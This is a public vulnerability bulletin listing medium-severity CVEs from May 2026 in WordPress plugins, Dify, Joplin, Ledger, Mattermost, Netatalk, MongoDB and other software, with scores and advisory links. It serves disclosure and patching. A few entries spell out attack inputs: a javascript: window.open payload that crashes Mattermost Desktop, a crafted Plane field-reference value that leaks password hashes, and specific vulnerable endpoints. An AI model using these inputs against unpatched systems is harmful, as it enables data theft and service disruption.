ktulhu–Bigfishgames Syndicate The Bigfishgames Syndicate plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation on the bigfishgames_syndicate_submenu() function. This makes it possible for unauthenticated attackers to reset plugin settings and update them via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2026-05-20 4.3 CVE-2026-6452 https://www.wordfence.com/threat-intel/vulnerabilities/id/67877a2e-a45d-4674-b749-05d9217ef6bf?source=cve
https://plugins.trac.wordpress.org/browser/bigfishgames-syndicate/trunk/bigfishgames-syndicate.php#L238
https://plugins.trac.wordpress.org/browser/bigfishgames-syndicate/tags/1.2/bigfishgames-syndicate.php#L238
https://plugins.trac.wordpress.org/browser/bigfishgames-syndicate/trunk/bigfishgames-syndicate.php#L169
https://plugins.trac.wordpress.org/browser/bigfishgames-syndicate/tags/1.2/bigfishgames-syndicate.php#L169
 
langgenius–dify Dify version 1.14.1 and prior contain an authorization bypass vulnerability in the file preview endpoint that allows any authenticated user to read up to 3,000 characters of any uploaded document across all tenants and workspaces using only the file’s UUID. Attackers can access the /console/api/files/{file_id}/preview endpoint with an intercepted file UUID to extract sensitive content from documents without ownership or workspace permission verification. NOTE: Dify Cloud allows unauthenticated free self-registration, making account creation trivially accessible to any attacker. 2026-05-18 5.9 CVE-2026-41949 https://huntr.com/bounties/d50a0240-7951-4939-b989-9bded66c7682
https://github.com/langgenius/dify/pull/35797
https://www.vulncheck.com/advisories/dify-authorization-bypass-via-file-preview-endpoint
 
laurent22–joplin Joplin is an open source note-taking and to-do application that organises notes and lists into notebooks. Versions 3.6.14 and prior contain a Denial of Service (DoS) vulnerability in the title input functionality due to a lack of proper length validation. This flaw allows an attacker to cause an Out Of Memory (OOM) error and subsequent program termination by inserting an excessively long string into a note’s title. This can be triggered either through direct user interface (UI) input or programmatically via the local web service API after compromising an authentication token. There are two primary methods of exploitation: via user interface (UI) input, and via the local web service API. A local user can directly type or paste an extremely long string into the title field when creating or editing a note. Joplin runs a local web service (typically on port 41184) that allows programmatic interaction, such as creating or editing notes via HTTP API calls. If an attacker manages to exfiltrate or compromise the user’s authentication token (e.g., through malware on the local system, or other local vulnerabilities), they can then send a crafted HTTP POST request to this local API. By including an excessively long string in the title parameter of this request, the application will attempt to allocate an unbounded amount of memory. This issue has been patched in version 3.7.1. 2026-05-19 5.5 CVE-2025-57798 https://github.com/laurent22/joplin/security/advisories/GHSA-6jm8-gr87-q69x
https://github.com/laurent22/joplin/commit/5b8795da446a5a40c9e212c98b35e368ffce628e
 
laurent22–joplin Joplin is an open source note-taking and to-do application that organises notes and lists into notebooks. Versions 3.5.2 and prior contain a logic error in the delta API that allows share recipients to download notes that are no longer shared with them, related to but not fully fixed by the prior patch in #14289. In ChangeModel.delta, when DELTA_INCLUDES_ITEMS is enabled (the default), the latest state of items is attached to delta output without verifying that those items are still shared with the requesting user, and the existing removal logic only filters items deleted for all users. Additionally, the change compression logic incorrectly reduces create -> delete to NOOP, which is unsafe because compression is applied per page and an item can have multiple create events; if an earlier create falls on a separate page from a later create -> delete pair, the deletion is dropped and the sequence collapses to a create. As a result, the delta API returns a create event for a deleted item with the full latest content attached, exposing notes the user no longer has access to. This issue has been fixed in version 3.5.3. 2026-05-19 5.7 CVE-2026-34600 https://github.com/laurent22/joplin/security/advisories/GHSA-88x4-77rc-jw94
https://github.com/laurent22/joplin/issues/14110
https://github.com/laurent22/joplin/pull/14289
 
Ledger–Ledger Bitcoin app Ledger Bitcoin app versions 2.1.0 and 2.1.1 contain an address derivation vulnerability that allows attackers to cause incorrect Bitcoin addresses to be displayed by exploiting improper handling of miniscript policies containing the a: fragment. Attackers can craft malicious miniscript policies that cause the device to derive and display incorrect receiving addresses, potentially leading to funds being sent to unintended addresses. 2026-05-20 4 CVE-2023-7346 Ledger Security Bulletin 019
https://www.vulncheck.com/advisories/ledger-bitcoin-app-address-derivation-error-via-miniscript
 
Ledger–Ledger Nano X Ledger Nano X, Flex, and Stax devices contain a denial of service vulnerability in the MCU firmware update process due to missing validation of the reset_handler parameter during firmware flashing. An attacker can provide a crafted reset_handler address pointing to invalid memory or attacker-controlled code to cause the device to enter an unrecoverable fault state during boot, resulting in permanent loss of operability. 2026-05-19 4.6 CVE-2025-15645 Ledger Security Bulletin 021
https://www.vulncheck.com/advisories/ledger-nano-x-flex-stax-mcu-firmware-update-denial-of-service
 
Ledger–ledgerhq/hw-app-eth Ledger Live with vulnerable versions of ledgerhq/hw-app-eth prior to 6.34.7 contains an integer parsing vulnerability that allows attackers to manipulate EIP-712 typed data messages by exploiting incorrect hexadecimal field parsing when values contain an odd number of characters. Attackers can obtain signatures on truncated or misinterpreted message values to authorize unintended blockchain transactions, such as asset transfers at incorrect amounts. 2026-05-19 6.5 CVE-2023-7345 Ledger Security Bulletin 020
https://www.vulncheck.com/advisories/ledger-live-hw-app-eth-eip-712-message-parsing-integer-truncation
 
linlinjava–litemall A security vulnerability has been detected in linlinjava litemall up to 1.8.0. Affected by this vulnerability is the function backup/load of the file litemall-db/src/main/java/org/linlinjava/litemall/db/util/DbUtil.java of the component Database Setting Handler. The manipulation of the argument db/password leads to argument injection. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-18 4.7 CVE-2026-8773 VDB-364398 | linlinjava litemall Database Setting DbUtil.java load argument injection
VDB-364398 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #811469 | linlinjava litemall up to 1.8.0 Argument Injection
https://gist.github.com/A1AAAAAAAAAA1/d5ae30a17744459e7cc5902fff32a35b
 
Live Networks, Inc.–LIVE555 LIVE555 before 2026.04.22 contains an authorization bypass vulnerability in RTSP session command handling that allows attackers to replay valid Session tokens from unauthenticated connections. Attackers who obtain a valid Session token can issue PLAY and TEARDOWN commands from a second TCP connection without authentication, causing server crashes through virtual function call errors or disrupting active streams by terminating victim sessions. 2026-05-19 5.9 CVE-2026-41470 https://gist.github.com/yhcho0405/ee9b67a96808ef19f22e8a4ee88c795f
https://download.live555.com/
https://www.vulncheck.com/advisories/live555-rtsp-server-authorization-bypass-via-session-token
 
lykich–Correct Prices The Correct Prices plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the $_SERVER['PHP_SELF'] variable in versions up to and including 1.0. This is due to the correct_prices_page() function echoing $_SERVER['PHP_SELF'] into a form’s action attribute without any input sanitization or output escaping (such as esc_url() or esc_attr()). Because PHP_SELF reflects attacker-controlled path-info appended to the script URL, an attacker can break out of the attribute and inject arbitrary markup. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a specially crafted link. 2026-05-20 6.1 CVE-2026-8627 https://www.wordfence.com/threat-intel/vulnerabilities/id/605c6c53-6920-42ba-8784-b3a186bbf821?source=cve
https://plugins.trac.wordpress.org/browser/correct-prices/trunk/correct_prices.php#L134
 
Magepeople inc.–WpBookingly Missing Authorization vulnerability in Magepeople inc. WpBookingly allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WpBookingly: from n/a through 1.2.9. 2026-05-20 6.5 CVE-2026-27405 https://patchstack.com/database/wordpress/plugin/service-booking-manager/vulnerability/wordpress-wpbookingly-plugin-1-2-9-broken-access-control-vulnerability?_s_id=cve
 
makeplane–plane Plane is an open-source project management tool. In versions 1.3.0 and below, SavedAnalyticEndpoint passes the user-controlled segment query parameter directly to a Django F() expression without validation (unlike the regular AnalyticsEndpoint, which checks against an allowlist), causing ORM Field Reference Injection. An authenticated workspace MEMBER can send GET /api/workspaces/<slug>/saved-analytic-view/<analytic_id>/ with a crafted segment value that is forwarded into build_graph_plot() and traverses foreign-key relationships (e.g. workspace__owner__password) before being projected via .values("dimension", "segment"), returning the referenced field values directly in the JSON response. This exposes sensitive data such as bcrypt password hashes, API tokens, and related users’ email addresses, making it a stronger primitive than the related order_by injection where values are only leaked through ordering. This issue has been fixed in version 1.3.1. 2026-05-20 6.5 CVE-2026-40102 https://github.com/makeplane/plane/security/advisories/GHSA-93x3-ghh7-72j3
https://github.com/makeplane/plane/releases/tag/v1.3.1
 
manchumahara–CBX 5 Star Rating & Review The CBX 5 Star Rating & Review plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘page’ parameter in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link. 2026-05-22 6.1 CVE-2026-6864 https://www.wordfence.com/threat-intel/vulnerabilities/id/9ee11e19-21a6-45df-a118-f6dec3b55bc1?source=cve
https://plugins.trac.wordpress.org/browser/cbxscratingreview/tags/1.0.7/templates/admin/admin-rating-review-rating-avg-logs.php#L41
https://plugins.trac.wordpress.org/browser/cbxscratingreview/tags/1.0.7/templates/admin/admin-rating-review-review-logs.php#L41
https://plugins.trac.wordpress.org/browser/cbxscratingreview/tags/1.0.8/templates/admin/admin-rating-review-review-logs.php
https://plugins.trac.wordpress.org/browser/cbxscratingreview/tags/1.0.8/templates/admin/admin-rating-review-rating-avg-logs.php
 
mantisbt–mantisbt Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and below contain flawed logic that causes improper escaping of a textarea custom field’s contents in the Update Issue page (bug_update_page.php), allowing an attacker to inject HTML and, if CSP settings permit, execute arbitrary JavaScript when the page is loaded. This facilitates session theft, leading to admin account takeover and full project data access. In order to exploit this issue, a textarea-type custom field must be configured for the project, and the attack must be carried out by an authenticated user with bug report permission (low privilege). This can affect any user viewing the bug edit form, including administrators. The issue has been fixed in version 2.28.2. If users cannot immediately upgrade, they can work around the issue by using the default Content Security Policy, which blocks script execution. 2026-05-20 5.4 CVE-2026-39960 https://github.com/mantisbt/mantisbt/security/advisories/GHSA-qj6w-v29q-4rgx
https://github.com/mantisbt/mantisbt/commit/5fec0f448b7a7d7d539a6adb6dccceac4e4e4ab7
 
mantisbt–mantisbt Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior allow an authenticated user to upload attachments to private Issues they are not authorized to access. This issue has been fixed in version 2.28.2. 2026-05-19 4.3 CVE-2026-34754 https://github.com/mantisbt/mantisbt/security/advisories/GHSA-h4x5-gvx6-3rwc
https://github.com/mantisbt/mantisbt/commit/b262b4d2835b81394d75356dead66e52a6275206
https://mantisbt.org/bugs/view.php?id=36976
 
Mattermost–Mattermost Mattermost Mobile Apps versions <=2.37 11.4 2.0.37 11.0.4 11.1.3 11.3.2 10.11.11.0 fail to properly validate the SSO authentication callback origin which allows an attacker controlling a malicious Mattermost server to steal user credentials for a legitimate Mattermost server via relaying the SSO code exchange flow through the mobile application. Mattermost Advisory ID: MMSA-2025-00564 2026-05-21 6.1 CVE-2026-22880 MMSA-2025-00564
 
Mattermost–Mattermost Mattermost Plugins versions <=11.5 11.1.5 10.13.11 11.3.4.0 fail to properly check for permissions when processing commands in the Gitlab plugin which allows normal users to uninstall instances or setup webhook connections via the {{gitlab instance {option}}} or the {{/gitlab webhook {option}}} commands. Mattermost Advisory ID: MMSA-2026-00600 2026-05-18 6.5 CVE-2026-3117 MMSA-2026-00600
 
Mattermost–Mattermost Mattermost Desktop App versions <=6.1 6.0.1 5.4.13.0 fail to prevent an invalid URL from loading in a pop-up window in the Mattermost Desktop App which allows a malicious server owner to repeatedly crash the application via calling {{window.open(‘javascript:alert()’);}}. Mattermost Advisory ID: MMSA-2026-00618 2026-05-18 6.5 CVE-2026-3471 MMSA-2026-00618
 
Mattermost–Mattermost Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to archive the channel before removing persistent notifications which allows an authenticated user to crash the server via timing the creation of a persistent notification message between the server deleting existing persistent notifications and archiving the channel. Mattermost Advisory ID: MMSA-2026-00637 2026-05-22 6.5 CVE-2026-4635 MMSA-2026-00637
 
Mattermost–Mattermost Mattermost versions 11.5.x <= 11.5.1 fail to verify channel membership when processing AI-assisted message rewrites which allows an authenticated attacker to read the content of threads in private channels and direct messages they do not have access to via a crafted request to the post rewrite endpoint. Mattermost Advisory ID: MMSA-2026-00645 2026-05-18 6.5 CVE-2026-5163 MMSA-2026-00645
 
Mattermost–Mattermost Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.2, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to validate the TIFF IFD offset in the image header before allocating memory, which allows authenticated users with file upload or posting permissions to cause a denial of service (server OOM) via uploading a crafted TIFF file or posting a URL that serves one. Mattermost Advisory ID: MMSA-2026-00648 2026-05-22 6.5 CVE-2026-5755 MMSA-2026-00648
 
Mattermost–Mattermost Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to prevent disclosure of created user passwords which allows a malicious attacker to impersonate a user via the use of some of those passwords. Mattermost Advisory ID: MMSA-2026-00614 2026-05-18 6.5 CVE-2026-6345 MMSA-2026-00614
 
Mattermost–Mattermost Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to validate the OAuth token scope on the callback which allows an authenticated Mattermost user to gain access to private repositories via modifying the scope parameter in the GitHub authorization URL. Mattermost Advisory ID: MMSA-2026-00628 2026-05-22 5.4 CVE-2026-28735 MMSA-2026-00628
 
Mattermost–Mattermost Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to validate file ownership and access control, which allows an authenticated user to access and download files belonging to other users or teams via crafted Boards API requests using valid file IDs. Mattermost Advisory ID: MMSA-2026-00620 2026-05-22 5.9 CVE-2026-3473 MMSA-2026-00620
 
Mattermost–Mattermost Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to limit the size of the request body on the start meeting API endpoint, which allows an authenticated attacker to cause resource exhaustion or denial of service via a crafted oversized HTTP POST request to /api/v1/meetings. Mattermost Advisory ID: MMSA-2026-00608 2026-05-18 4.3 CVE-2026-2325 MMSA-2026-00608
 
Mattermost–Mattermost Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to enforce slash command trigger-word uniqueness during command updates, which allows an authenticated team member with Manage Own Slash Commands permission to hijack and impersonate existing system or custom slash commands via editing their own slash command trigger to an already-registered trigger through the command update API. Mattermost Advisory ID: MMSA-2026-00597 2026-05-18 4.3 CVE-2026-28732 MMSA-2026-00597
 
Mattermost–Mattermost Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to validate that a remote cluster has access to a channel before processing membership removal requests during shared channel membership sync, which allows a malicious remote cluster to remove any user from any channel, including private channels, via crafted membership sync messages targeting channels the remote cluster is not authorized to access. Mattermost Advisory ID: MMSA-2026-00576 2026-05-18 4.3 CVE-2026-28759 MMSA-2026-00576
 
Mattermost–Mattermost Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to sanitize team member data when returned via API to users without elevated permissions, which allows a user without permissions to get data about team members' roles via invoking various team API endpoints. Mattermost Advisory ID: MMSA-2026-00626 2026-05-22 4.3 CVE-2026-3636 MMSA-2026-00626
 
Mattermost–Mattermost Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to check the create_post channel permission during post edit operations which allows an authenticated attacker with revoked posting privileges to modify their existing posts via direct API requests to the post update and patch endpoints. Mattermost Advisory ID: MMSA-2026-00627 2026-05-18 4.3 CVE-2026-3637 MMSA-2026-00627
 
Mattermost–Mattermost Mattermost versions 11.5.x <= 11.5.1 fail to validate team-level run_create permission against the target team when creating a playbook run which allows an authenticated team member to create runs in teams where they lack permission via specifying a different team ID in the run creation API request. Mattermost Advisory ID: MMSA-2026-00629 2026-05-21 4.3 CVE-2026-4055 MMSA-2026-00629
 
Mattermost–Mattermost Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to validate user-supplied input in API request handlers which allows an authenticated attacker to crash the plugin process via a crafted HTTP request to the PR details endpoint. Mattermost Advisory ID: MMSA-2026-00638 2026-05-22 4.3 CVE-2026-4646 MMSA-2026-00638
 
Mattermost–Mattermost Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to enforce request body size limits on plugin HTTP endpoints which allows an attacker to cause a denial of service via crafted oversized HTTP requests. Mattermost Advisory ID: MMSA-2026-00646 2026-05-22 4.9 CVE-2026-5308 MMSA-2026-00646
 
Mattermost–Mattermost Mattermost versions 11.5.x <= 11.5.1, 11.4.x <= 11.4.3 fail to validate the X-Requested-With header on the burn-on-read reveal endpoint which allows an authenticated channel member to force the reveal of a burn-on-read message without recipient consent via a crafted Markdown image tag. Mattermost Advisory ID: MMSA-2026-00636 2026-05-18 4.3 CVE-2026-6339 MMSA-2026-00636
 
Mattermost–Mattermost Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to validate 7zip archive structure before processing which allows an authenticated attacker to cause server memory exhaustion and denial of service via uploading a specially crafted 7zip file with excessive folder declarations. Mattermost Advisory ID: MMSA-2026-00573 2026-05-18 4.3 CVE-2026-6340 MMSA-2026-00573
 
Mattermost–Mattermost Mattermost Plugins versions <=11.5 11.1.5 10.13.11 11.3.4.0 fail to have API-level checks on which groups the user can create issues or attach comments to which allows a user that is member of multiple groups to create issues to a locked group via direct API requests. Mattermost Advisory ID: MMSA-2026-00602 2026-05-18 4.3 CVE-2026-6341 MMSA-2026-00602
 
Mattermost–Mattermost Mattermost Plugins versions <=11.5 11.1.5 10.13.11 11.3.4.0 fail to appropriately check for valid namespaces which allows plugin users to create subscriptions to groups that were not whitelisted via creating groups that share the same prefix as a whitelisted group. Mattermost Advisory ID: MMSA-2026-00601 2026-05-18 4.3 CVE-2026-6342 MMSA-2026-00601
 
Mattermost–Mattermost Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to check public/private permissions which allows members without these permissions to access public playbooks via /get. Mattermost Advisory ID: MMSA-2026-00591 2026-05-18 4.3 CVE-2026-6343 MMSA-2026-00591
 
mcinvale–Faces of Users The Faces of Users plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘default’ shortcode attribute in the ‘facesofusers’ shortcode in all versions up to, and including, 0.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2026-05-20 6.4 CVE-2026-8038 https://www.wordfence.com/threat-intel/vulnerabilities/id/ea39d249-0345-4028-af58-31b298376950?source=cve
https://plugins.trac.wordpress.org/browser/faces-of-users/trunk/faces-of.php#L62
https://plugins.trac.wordpress.org/browser/faces-of-users/tags/0.0.3/faces-of.php#L62
 
Mesalvo–Meona Client Launcher Component Cleartext Storage of Sensitive Information in Memory vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. 2026-05-20 6 CVE-2026-0857 https://seccore.at/blog/cves-meona/
 
Mesalvo–Meona Client Launcher Component Insufficient Verification of Data Authenticity vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component makes it possible to send messages to any email address. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. 2026-05-20 4.4 CVE-2026-25602 https://seccore.at/blog/cves-meona/
 
Microsoft–Microsoft 365 Copilot Improper neutralization of special elements used in a command (‘command injection’) in M365 Copilot allows an unauthorized attacker to disclose information over a network. 2026-05-22 6.5 CVE-2026-42827 M365 Copilot Information Disclosure Vulnerability
 
Microsoft–Microsoft Defender Antimalware Platform Microsoft Defender Denial of Service Vulnerability 2026-05-20 4 CVE-2026-45498 Microsoft Defender Denial of Service Vulnerability
 
Microsoft–Microsoft Edge (Chromium-based) Improper input validation in Microsoft Edge (Chromium-based) allows an unauthorized attacker to bypass a security feature over a network. 2026-05-18 5.4 CVE-2026-45492 Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability
 
Microsoft–Microsoft Edge (Chromium-based) Microsoft Edge (Chromium-based) Spoofing Vulnerability 2026-05-18 5.4 CVE-2026-45494 Microsoft Edge (Chromium-based) Spoofing Vulnerability
 
Microsoft–Windows 11 Version 24H2 Microsoft is aware of a security feature bypass vulnerability in Windows publicly referred to as "YellowKey". The proof of concept for this vulnerability has been made public, violating coordinated vulnerability best practices. We are issuing this CVE to provide mitigation guidance that can be implemented to protect against this vulnerability until the security update is made available. Mitigation FAQs: Should I leverage the temporary mitigation? Microsoft recommends that you consider implementing these mitigations if you are concerned your devices and data are at risk of being compromised or stolen, for example if your organization's employees take their work devices home or on business travel. What impact to service availability/management could be caused by implementing the mitigations? Implementing these mitigations will not impact service availability or management operations. Do customers need to revert the changes made to mitigate the vulnerability once the security update to protect against this vulnerability is available? No. The security update will maintain the mitigation's behavior once the security update is installed. I am using TPM+PIN, am I at risk of this vulnerability being exploited? No, if you are using TPM+PIN the vulnerability is not exploitable. 2026-05-19 6.8 CVE-2026-45585 Windows BitLocker Security Feature Bypass Vulnerability
 
MongoDB, Inc.–C Driver The MongoDB C Driver’s legacy GridFS API accepts malformed file metadata from the database without adequate validation. Crafted documents in a GridFS collection may cause any application that reads those files via the legacy API to either crash (via a division-by-zero) or silently leak process memory contents (via an out-of-bounds read). 2026-05-20 5.9 CVE-2026-9100 https://jira.mongodb.org/browse/CDRIVER-6281
 
MongoDB, Inc.–Compass Prototype pollution in csv parsing logic during import can lead to untrusted file paths (but not arguments) entering shell.openExternal after specific user behavior leading to “1-click” command execution. 2026-05-20 4.3 CVE-2026-9101 https://jira.mongodb.org/browse/COMPASS-10657
 
MongoDB, Inc.–MongoDB Server Creating a “2dsphere_bucket” index on a non-timeseries bucket collection will succeed, but any subsequent attempt to insert a document which triggers updating that index will crash the server. A similar issue occurs when creating “queryable_encrypted_range” indices. This issue affects MongoDB Server v7.0 versions prior to 7.0.32, v8.0 versions prior to 8.0.21 and v8.2 versions prior to 8.2.6 2026-05-18 6.5 CVE-2026-8843 https://jira.mongodb.org/browse/SERVER-116327
 
mrdollar4444–GSheet For Woo Importer The GSheet For Woo Importer plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the process_ajax_restore_action() function in all versions up to, and including, 2.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the plugin’s Google Sheets API token and configuration options. 2026-05-21 4.3 CVE-2026-4843 https://www.wordfence.com/threat-intel/vulnerabilities/id/b0d60991-0675-4efa-9427-380e6b59fe28?source=cve
https://plugins.trac.wordpress.org/browser/import-products-from-gsheet-for-woo-importer/tags/2.3.1/src/Actions/AdminSettingsAction.php#L391
 
n/a–Ettercap A vulnerability has been found in Ettercap up to 0.8.3. The affected element is the function FUNC_DECODER of the file src/dissectors/ec_gg.c of the component GG Dissector. The manipulation of the argument gg leads to a heap-based buffer overflow. The attack can be carried out remotely. The complexity of an attack is rather high, and exploitability is described as difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 0.8.4 is sufficient to fix this issue. The identifier of the patch is feeae6fa366e01a3dd9f1857ec6aae847b2ae00c. It is suggested to upgrade the affected component. 2026-05-24 5.6 CVE-2026-9365 VDB-365328 | Ettercap GG Dissector ec_gg.c FUNC_DECODER heap-based overflow
VDB-365328 | CTI Indicators (IOB, IOC, IOA)
Submit #813142 | Ettercap <=v0.8.4 Heap-based Buffer Overflow
https://github.com/Ettercap/ettercap/issues/1306
https://github.com/Ettercap/ettercap/pull/1307
https://github.com/Ettercap/ettercap/commit/feeae6fa366e01a3dd9f1857ec6aae847b2ae00c
https://github.com/Ettercap/ettercap/
 
n/a–exifreader Versions of the package exifreader before 4.39.0 are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) due to decompressing PNG zTXt metadata without enforcing a built-in maximum decompressed output size. When asynchronous parsing is enabled, a crafted PNG file containing a highly compressed zTXt chunk can cause ExifReader to materialize a disproportionately large Comment value in memory. 2026-05-19 5.3 CVE-2026-8814 https://security.snyk.io/vuln/SNYK-JS-EXIFREADER-16689340
https://gist.github.com/yuki-matsuhashi/cad1a45d936062438b4ab24613c34c55
https://github.com/mattiasw/ExifReader/commit/5f116128adc19f674902f8bf582bfe7dd0a36375
 
n/a–JPress A vulnerability was determined in JPress up to 1.0.3. The affected element is an unknown function of the file /ucenter/article/doWriteSave of the component UCenter Article Submission Endpoint. Executing a manipulation of the argument id/userId can lead to improper authorization. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. 2026-05-24 6.3 CVE-2026-9376 VDB-365339 | JPress UCenter Article Submission Endpoint doWriteSave improper authorization
VDB-365339 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #813253 | JPress 1.0.3 Improper Authorization
https://github.com/JPressProjects/jpress/issues/194
 
n/a–postcss A vulnerability was determined in postcss up to 7.1.1. Affected is the function toString of the file src/selectors/container.js of the component AST Serialization. Executing a manipulation can lead to uncontrolled recursion. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor explains that, according to their definition, "DoS on server-side on user-generated CSS is low risk for us (since most users compile own CSS with PostCSS)." 2026-05-24 4.3 CVE-2026-9358 VDB-365321 | postcss AST Serialization container.js toString recursion
VDB-365321 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #813080 | postcss-selector-parser postcss <= 7.1.1 CWE-674: Uncontrolled Recursion
https://gist.github.com/bx33661/581e3a38134601c04e19b4dfc9b459b9
 
nanomq–nanomq NanoMQ MQTT Broker (NanoMQ) is an all-around Edge Messaging Platform. In versions 0.24.10 and below, when NanoMQ handles high-concurrency reconnect traffic using a reconnect-collision payload, the broker can crash due to a NULL pointer dereference during MQTT session resumption for clean_start=0 clients. The transport’s p_peer callback (tcptran_pipe_peer()) iterates cpipe->subinfol while copying session metadata from the cached old pipe to the new reconnecting pipe, without checking whether the pointer is NULL. Under a reconnect race, cpipe->subinfol can be freed and set to NULL before session restore invokes this function, resulting in a remote unauthenticated Denial-of-Service (process crash) condition. This issue has been fixed in version 0.24.11. 2026-05-19 5.9 CVE-2026-32134 https://github.com/nanomq/nanomq/security/advisories/GHSA-q36f-83mh-pcv2
https://github.com/nanomq/nanomq/issues/2241
https://github.com/nanomq/NanoNNG/commit/522ec62e29e60d1122f2aedaa6e702dcf089f7bb
https://github.com/nanomq/nanomq/releases/tag/0.24.11
 
NeoRazorX–facturascripts FacturaScripts is an open source accounting and invoicing software. In versions prior to 2026, the Library module stores and serves uploaded images byte-for-byte, without stripping EXIF/XMP/IPTC metadata. Any authenticated user who downloaded an image could extract the uploader’s embedded metadata, which included GPS coordinates, device information, timestamps, embedded comments/notes, thumbnail previews, and other personally identifiable information (PII) preserved in the image metadata. Of all FacturaScripts’ image upload features, only the Library module combined unrestricted uploads, persistent storage, authenticated download access, and a total lack of server-side metadata sanitization. This vulnerability carries significant real-world impact: an employee uploading a photo taken at their home inadvertently discloses their precise home address to every user with Library download access. This issue has been fixed in version 2026. 2026-05-18 6.5 CVE-2026-27892 https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-q7f2-rv22-2xgr
https://github.com/NeoRazorX/facturascripts/commit/b0725147a61a9a377b7180589af33ff52b4751e2
 
Netatalk–Netatalk Netatalk 2.0.0 through 4.4.2 generates AFP session tokens derived from predictable process IDs, which allows a remote authenticated attacker to cause a denial of service by exploiting the reconnect mechanism. 2026-05-21 6.5 CVE-2026-44054 Netatalk Security Advisory CVE-2026-44054
 
Netatalk–Netatalk A stack-based buffer overflow in desktop.c in Netatalk 1.3 through 4.2.2 allows a remote authenticated attacker to cause a denial of service, obtain limited information, or modify limited data. 2026-05-21 6 CVE-2026-44056 Netatalk Security Advisory CVE-2026-44056
 
Netatalk–Netatalk An authentication bypass vulnerability in Netatalk 2.2.2 through 4.4.2 allows a remote privileged user to authenticate as an arbitrary user via the admin auth user mechanism. 2026-05-21 6.4 CVE-2026-44058 Netatalk Security Advisory CVE-2026-44058
 
Netatalk–Netatalk Insufficient sanitization of volume paths in Netatalk 3.1.0 through 4.4.2 allows a local privileged user to inject OS commands and execute arbitrary code via a crafted volume path. 2026-05-21 6.7 CVE-2026-44076 Netatalk Security Advisory CVE-2026-44076
 
Netatalk–Netatalk Netatalk 1.5.0 through 4.4.2 uses DES-ECB for authentication with a timing side channel, which allows a remote attacker to recover authentication credentials via timing analysis. 2026-05-21 5.9 CVE-2026-44061 Netatalk Security Advisory CVE-2026-44061
 
Netatalk–Netatalk An LDAP injection vulnerability in Netatalk 2.1.0 through 4.4.2 allows a remote authenticated attacker to manipulate LDAP queries and obtain limited information or modify LDAP entries via crafted filter input. 2026-05-21 4.2 CVE-2026-44063 Netatalk Security Advisory CVE-2026-44063
 
Netatalk–Netatalk Authentication modules in Netatalk 1.5.0 through 4.4.2 fail to check the return value of seteuid(), which may allow a remote authenticated attacker to retain elevated privileges under error conditions. 2026-05-21 4 CVE-2026-44073 Netatalk Security Advisory CVE-2026-44073
 
